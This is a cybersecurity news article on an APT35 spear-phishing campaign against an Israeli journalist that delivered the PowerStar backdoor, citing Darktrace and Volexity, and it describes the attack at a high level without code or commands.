APT35, also known as Charming Kitten, Imperial Kitten, or Tortoiseshell, an Iran-linked threat group, has recently upgraded its cyberattack capabilities with enhanced methods to conceal its activities. Additionally, the group has developed an upgraded custom backdoor that is being distributed through spear-phishing campaigns.
The main objective of APT35 is to collect intelligence by compromising account credentials and gaining access to the email accounts of targeted individuals. Recently, the group attempted a highly targeted spear-phishing campaign against an Israeli journalist. The attack involved the use of a “draft report” lure, which was a password-protected RAR file containing a malicious LNK file that downloaded the upgraded backdoor.
Before sending the malware to the victim, the attackers engaged in a series of interactions to establish a sense of legitimacy. They initially asked the target if they would be open to reviewing a document related to US foreign policy. The target agreed, and the attackers continued the interaction with another benign email containing a list of questions. After several days of seemingly legitimate communication, the attackers finally sent the malware-infected “draft report.”
Toby Lewis, the global head of threat analysis at Darktrace, commented on the targeting profile of APT35, stating that it aligns with what one would expect from a group associated with the Iranian government. He emphasized the group’s focus on being bespoke, stealthy, and under the radar, which requires sophisticated social engineering methods to maximize their success.
During this recent campaign, APT35 distributed the PowerStar malware, which is an updated version of its previously known backdoor called CharmPower. The malware was delivered through an email containing a password-protected RAR file with an LNK file inside. When executed, the LNK file downloaded PowerStar from a hosting provider called Backblaze and sent a small amount of system information to a command-and-control (C2) address.
According to Volexity, the variant of PowerStar used in this campaign is particularly complex and likely supported by a custom server-side component. This component automates simple actions for the malware operator and downloads a decryption function from remotely hosted files, making it harder to detect and analyze the malware.
Lewis highlighted the varying levels of sophistication among APT groups and their motivations for achieving a return on their investment. He explained that some groups may rely on unsophisticated campaigns, while others develop their own zero-day exploits and demonstrate expertise in infrastructure management and control.
Volexity researchers stated that they frequently observe operations from APT35 but find that the group rarely deploys malware as part of their attacks. This sparing use of malware makes it more challenging to track their activities and adds to the group’s sophistication.
APT35 has been active for over a decade and has conducted extensive campaigns against organizations and officials in North America and the Middle East. Public attribution has attributed APT35 as an Iran-based nation-state threat actor. Recent campaigns by the group have raised concerns about Iran’s potential physical targeting of dissenters for kidnapping and other kinetic operations.
The continuous evolution and upgrade of APT35’s cyberattack capabilities highlight the persistent threat that nation-state-sponsored groups pose to organizations and individuals worldwide. These developments emphasize the importance of implementing robust cybersecurity measures to detect and mitigate such threats.